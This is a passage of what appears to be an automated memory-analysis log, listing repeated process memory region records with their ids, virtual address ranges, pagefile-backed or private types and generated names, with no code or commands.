start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6570 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6571 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6572 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6573 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6574 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6575 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6576 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6577 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6578 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6579 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6580 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6581 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" 
Region: id = 6582 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6723 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6724 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6725 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6726 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6727 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6728 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6729 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6730 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6731 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6732 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6937 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6938 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" 
Region: id = 6939 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6940 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6941 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6966 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6967 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6968 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6969 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6970 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7161 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7162 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7163 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7164 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7165 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" 
filename = "" Region: id = 7211 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7212 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7213 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7214 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7215 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7467 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7468 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7469 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7470 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7471 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7475 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7476 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7477 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" 
filename = "" Region: id = 7478 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7479 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7679 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7680 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7681 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7682 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7683 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7710 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7711 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7712 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7713 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7714 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7950 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" 
filename = "" Region: id = 7951 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7952 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7953 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7954 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 7972 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7973 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 7974 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 7975 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7976 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8152 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8153 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8154 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8155 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001e0000" filename = "" Region: id = 8156 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8192 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8193 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8194 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8195 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8196 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8444 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8445 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8446 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8447 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8448 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8487 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8488 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001750000" filename = "" Region: id = 8489 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8490 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8491 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8681 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8682 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8683 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8684 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8685 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8726 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8727 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8728 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8729 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8730 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8957 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8958 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 8959 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 8960 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8961 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9035 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9036 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9037 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9038 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9100 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9285 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9286 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9287 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9288 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9289 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9310 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9311 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9312 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9313 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9314 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9495 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9496 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9497 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9498 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9499 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9525 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private 
name = "private_0x00000000001d0000" filename = "" Region: id = 9526 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9527 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9528 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9529 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9652 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9653 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9654 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9655 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9656 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9690 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9691 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9692 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9693 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9694 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9786 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9787 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9788 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9789 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9790 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9831 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9832 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9833 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9834 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9835 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9992 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9993 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 9994 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 9995 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9996 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10025 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10026 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10027 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10028 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10029 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10212 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10213 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10214 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10215 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10216 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10259 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10260 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10261 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10262 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10263 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10498 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10499 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10500 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10501 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10502 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10577 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10578 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10579 start_va = 0x1b60000 end_va = 0x1f6ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10580 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10581 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10750 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10751 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10752 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10753 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10754 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10796 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10797 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10798 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10799 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10800 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10963 start_va = 0x1d0000 
